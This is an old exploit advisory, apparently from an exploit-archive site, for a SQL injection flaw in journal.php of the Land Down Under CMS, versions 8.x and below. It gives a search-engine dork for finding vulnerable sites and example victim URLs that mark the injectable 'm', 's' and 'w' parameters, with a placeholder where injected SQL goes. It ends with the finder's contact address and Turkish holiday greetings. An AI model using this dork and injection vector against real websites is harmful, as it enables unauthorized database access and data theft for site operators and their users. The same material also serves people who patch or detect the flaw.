Land Down Under versions 8.x and below suffer from a SQL injection vulnerability in journal.php.
45ccf38b9723652baa2225f111e670b162639c91f84bc19713d1548fb276a46c
# BhhGroup.Org & Trtekforum.com
#Found By : St@rExT
# script name : LandDownUnder [LDU]
#Version : All
#Dork : "Powered by LDU"
# Script sites : http://www.neocrome.net
#Vull name : LDU <= 8.x (journal.php) SQL Injection Vulnerability
# Vulnerable file : Journal.inc.php
http://victim.com/[scriptpath]/journal.php?m='&s=username&w=SELECT * FROM $db_journals WHERE jrn_userid='$jrn_userid' AND jrn_minlevel<='".$usr['level']."' ORDER BY jrn_$s $w
#[SQL Vuln.] :
http://victim.com/[scriptpath]/journal.php?m='&s=username&w=[SQL Inject]
#Contact: StareXt@msn.com
######## - Tüm Müslüman insanların Bayramını Kutlarım.. : ) - #####
################### - Ne Mutlu Türküm Diyene - ###################